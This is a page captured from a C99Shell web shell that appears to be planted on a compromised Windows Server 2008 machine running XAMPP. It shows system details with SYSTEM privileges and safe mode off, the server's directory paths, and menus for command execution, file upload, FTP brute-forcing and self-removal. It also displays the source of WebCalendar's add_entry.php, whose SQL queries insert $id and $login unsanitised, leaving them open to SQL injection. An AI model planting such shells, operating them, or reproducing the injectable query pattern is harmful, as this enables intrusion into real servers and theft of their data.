!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\WebCalendar-1.0.2\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     add_entry.php (1.36 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once 'includes/init.php';
load_user_categories();

$error "";

// Only proceed if id was passed
if ( $id ) {

  
// double check to make sure user doesn't already have the event
  
$is_my_event false;
  
$sql "SELECT cal_id FROM webcal_entry_user " .
    
"WHERE cal_login = '$login' AND cal_id = $id";
  
$res dbi_query $sql );
  if ( 
$res ) {
    
$row dbi_fetch_row $res );
    if ( 
$row[0] == $id ) {
      
$is_my_event true;
      echo 
"Event # " $id " is already on your calendar.";
      exit;
    }
    
dbi_free_result $res );
  }

  
// Now lets make sure the user is allowed to add the event (not private)

  
$sql "SELECT cal_access FROM webcal_entry WHERE cal_id = " $id;
  
$res dbi_query $sql );
  if ( ! 
$res ) {
    echo 
translate("Invalid entry id") . ": $id";
    exit;
  }
  
$row dbi_fetch_row $res );

  if ( 
$row[0] == "R" && ! $is_my_event ) {
    
$is_private true;
    
etranslate("This is a private event and may not be added to your calendar.");
    exit;
  } else {
    
$is_private false;
  }

  
// add the event
  
if ( $readonly == "N" && ! $is_my_event && ! $is_private )  {
    if ( ! 
dbi_query "INSERT INTO webcal_entry_user ( cal_id, cal_login, cal_status ) VALUES ( $id, '$login', 'A' )") ) {
      
$error translate("Error adding event") . ": " dbi_error ();
    }
  }
}

send_to_preferred_view ();
exit;
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--